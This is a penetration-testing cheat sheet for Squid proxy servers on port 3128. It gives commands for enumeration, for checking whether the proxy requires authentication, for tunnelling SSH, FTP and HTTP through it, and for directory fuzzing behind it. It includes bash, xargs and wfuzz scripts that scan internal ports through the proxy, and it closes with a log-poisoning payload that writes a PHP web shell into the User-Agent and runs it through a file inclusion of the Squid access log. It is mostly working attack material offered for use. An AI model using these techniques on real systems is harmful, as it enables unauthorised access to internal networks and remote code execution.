3128 - Squid

Information

Default Port: 3128

PORT     STATE SERVICE
3128/tcp open  squid-http

Files

/etc/squid/squiq.conf
/var/log/squid/access.log
/var/log/squid/cache.log

Enumeration

nmap -p3128 -sS 192.168.1.2
nmap -p3128 -sVC 192.168.1.2

Check Auth

# -x/--proxy = proxy
curl -s --proxy "http://192.168.1.2:3128" 127.0.0.1:80
curl -s --proxy "http://192.168.1.2:3128" 127.0.0.1:80 |html2text
#or
curl -s -x "http://192.168.1.2:3128" 127.0.0.1:80
curl -s -x "http://192.168.1.2:3128" 127.0.0.1:80 |html2text

Output (Auth: NO)

❯ curl -s --proxy "http://192.168.1.2:3128/" "http://127.0.0.1:80" | html2text
[Debian Logo]Apache2 Debian Default Page
It works!
This is the default welcome page used to test the correct operation of the
Apache2 server after installation on Debian systems. If you can read this page,
it means that the Apache HTTP server installed at this site is working
properly. You should replace this file (located at /var/www/html/index.html)
before continuing to operate your HTTP server.

Output (Auth: YES)

Cache Access Denied

❯ curl -s --proxy "http://192.168.1.2:3128" "http://127.0.1:80" | html2text
****** ERROR ******
***** Cache Access Denied. *****
===============================================================================
The following error was encountered while trying to retrieve the URL: http://
127.0.0.1/
     Cache Access Denied.
Sorry, you are not currently allowed to request http://127.0.0.1/ from this
cache until you have authenticated yourself.
Please contact the cache administrator if you have difficulties authenticating
yourself.

===============================================================================
Generated Wed, 10 Sep 2025 08:17:35 GMT by tunnel (squid/5.7)

Proxy

Services

Spose

python3 spose.py --proxy http://192.168.1.2:3128 --target 127.0.0.1 --ports 21,22
python3 spose.py --proxy http://192.168.1.2:3128 --target 127.0.0.1 --allports

SSH

ssh -o ProxyCommand="corkscrew 192.168.1.2 3128 %h %p" jeff@127.0.0.1
ssh -o ProxyCommand="ncat --proxy 192.168.1.2:3128 --proxy-type http %h %p" jeff@127.0.0.1
proxychains ssh m.davis@127.0.0.1

FTP

lftp -e "set ftp:proxy http://192.168.1.2:3128; open ftp://anonymous@127.0.0.1"

Corkscrew

corkscrew 192.168.1.2 3128 127.0.0.1 22
corkscrew 192.168.1.2 3128 127.0.0.1 21

cURL

# -x/--proxy      = proxy
# -U/--proxy-user = proxy auth

# auth: no
curl --proxy "http://192.168.1.2:3128" "http://127.0.0.1:8000/"
curl -x "http://192.168.1.2:3128" "http://127.0.0.1:8000/"
# auth: yes
curl --proxy "http://192.168.1.2:3128" --proxy-user "proxy:Pr0xyH@sTh3P0w3r" "http://127.0.0.1:8000/"
curl -x "http://192.168.1.2:3128" -U "proxy:Pr0xyH@sTh3P0w3r" "http://127.0.0.1:8000"

Fuzzing

# auth: no
gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://127.0.0.1:1234/ --proxy 'http://192.168.1.2:3128' -b 404
# auth: yes
gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://127.0.0.1:8000/' --proxy 'http://proxy:Pr0xyH%40sTh3P0w3r@192.168.1.2:3128' -b 404
dirsearch -w /opt/directory-list-2.3-medium.txt -u "http://127.0.0.1:8000" --proxy "http://192.168.1.2:3128" --proxy-auth "proxy:Pr0xyH@sTh3P0w3r"

Internal Port Discovery

Corkscrew

#!/bin/bash

GREEN="\e[92m"
YELLOW="\e[93m"
RED="\e[91m"
WHITE="\e[97m"
END="\e[0m"

INTERNAL="127.0.0.1"
PROXY="192.168.1.2 3128"

echo
for PORT in {1..65535}; do
  OUT=$(timeout 0.1 corkscrew ${PROXY} ${INTERNAL} ${PORT} 2>/dev/null)
  EXIT_CODE=$?
  if [ ${EXIT_CODE} -eq 124 ]; then
    echo -e "${GREEN}[+] ${WHITE}Internal Port: ${YELLOW}${PORT} ${GREEN}(OPEN) ${RED}${OUT}${END}"
  fi
done

cURL

Auth: NO

#!/bin/bash

readonly GREEN="\e[92m"
readonly YELLOW="\e[93m"
readonly WHITE="\e[97m"
readonly END="\e[0m"

proxy="http://192.168.1.2:3128"
url="http://127.0.0.1"

echo
for port in {1..65535}; do
  http_code=$(curl --write-out %{http_code} --silent --output /dev/null "${url}:${port}" --proxy "$proxy")
  if [[ "$http_code" -eq 200 ]]; then
    echo -e "${GREEN}[+] ${WHITE}Internal Port: ${YELLOW}${port} ${GREEN}(OPEN)${END}"
  fi
done

Auth: YES

#!/bin/bash

GREEN="\e[92m"
YELLOW="\e[93m"
WHITE="\e[97m"
END="\e[0m"

PROXY="http://192.168.1.2:3128"
PROXY_AUTH='proxy:Pr0xyH@sTh3P0w3r'
URL="http://127.0.0.1"
START_PORT=1
END_PORT=10000

echo
for port in $(seq $START_PORT $END_PORT); do
  http_code=$(curl -s -o /dev/null -w "%{http_code}" \
    "${URL}:${port}" --proxy "$PROXY" --proxy-user "$PROXY_AUTH" --max-time 1)

  if [[ "$http_code" -eq 200 ]]; then
    echo -e "${GREEN}[+] ${WHITE}Internal Port: ${YELLOW}${port} ${GREEN}(OPEN)${END}"
  fi
done

Xargs

seq 1 65535 | xargs -P 50 -I {} sh -c 'curl -U proxy:Pr0xyH@sTh3P0w3r -x http://192.168.1.2:3128 http://127.0.0.1:{} -s -o /dev/null -w "%{http_code} {}\n" -m 1 2>/dev/null | grep "^200" | cut -d" " -f2'

Wfuzz

wfuzz -c -p 192.168.1.2:3128 -z range,1-65535 -u "http://127.0.0.1:FUZZ" --sc=200

Nmap

nano /etc/squid/squid.conf
http 192.168.1.2 3128

proxychains nmap -p1-500 -sT 127.0.0.1 2>/dev/null
proxychains nmap -p21,22 -sTVC 127.0.0.1 2>/dev/null

Log Poisoning

# User-Agent: <?php system($_GET['cmd']); ?>
curl -sX GET --proxy "http://192.168.1.2:3128" "http://127.0.0.1:80" -A '<?php system($_GET["cmd"]); ?>'

http://192.168.1.2/file.php?file=/var/log/squid/access.log&cmd=id